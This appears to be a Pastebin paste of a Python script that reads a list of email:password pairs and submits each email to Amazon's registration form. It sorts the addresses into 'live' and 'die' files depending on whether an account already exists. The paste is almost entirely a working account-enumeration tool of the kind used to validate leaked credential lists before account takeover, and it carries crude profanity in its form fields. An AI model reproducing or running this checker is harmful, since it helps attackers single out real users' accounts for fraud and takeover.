Advertisement
Guest User

Hy

a guest
Oct 22nd, 2018
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.07 KB | None | 0 0
  1. import requests
  2.  
  3. # Jangan Di Recode Ya Bossku
  4. # Tinggal Make Aja Apa Susahnya Sih :)
  5. # options output live dan die
  6.  
  7. live = open('Amz-Live.txt','w')
  8. die = open('Amz-Die.txt','w')
  9.  
  10. list = raw_input("\033[33;1mInput Mail List : \033[0m")
  11. link = "https://www.amazon.com/ap/register%3Fopenid.assoc_handle%3Dsmallparts_amazon%26openid.identity%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%252Fidentifier_select%26openid.ns%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%26openid.claimed_id%3Dhttp%253A%252F%252Fspecs.openid.net%252Fauth%252F2.0%252Fidentifier_select%26openid.return_to%3Dhttps%253A%252F%252Fwww.smallparts.com%252Fsignin%26marketPlaceId%3DA2YBZOQLHY23UT%26clientContext%3D187-1331220-8510307%26pageId%3Dauthportal_register%26openid.mode%3Dcheckid_setup%26siteState%3DfinalReturnToUrl%253Dhttps%25253A%25252F%25252Fwww.smallparts.com%25252Fcontactus%25252F187-1331220-8510307%25253FappAction%25253DContactUsLanding%252526pf_rd_m%25253DA2LPUKX2E7NPQV%252526appActionToken%25253DlptkeUQfbhoOU3v4ShyMQLid53Yj3D%252526ie%25253DUTF8%252Cregist%253Dtrue"
  12. head = {'User-agent':'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30'}
  13. s = requests.session()
  14. g = s.get(link, headers=head)
  15. list = open(list, 'r')
  16. print("-"*50)
  17. while True:
  18. email = list.readline().replace('\n','')
  19. if not email:
  20. break
  21. bacot = email.strip().split(':')
  22. xxx = {'customerName':'Androsex','email': bacot[0],'emailCheck': bacot[0],'password':'Kontol1337','passwordCheck':'Kontol1337'}
  23. cek = s.post(link, headers=head, data=xxx).text
  24. if "You indicated you are a new customer, but an account already exists with the e-mail" in cek:
  25. print("\033[32;1mLIVE\033[0m | "+email+" | [Amz Email ]")
  26. live.write(email)
  27. else:
  28. print("\033[31;1mDIE\033[0m | "+email+" | [ Amz Email ]")
  29. die.write(email)
  30. print("-"*50)
  31. print("\033[35;1mProccess Checking Done By X-Mr.R4h1M - ./Xi4u7\033[0m")
  32. print("Valid Email Saved In : Amz-Live.txt\nDie Email Saved In : Amz-Die.txt")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement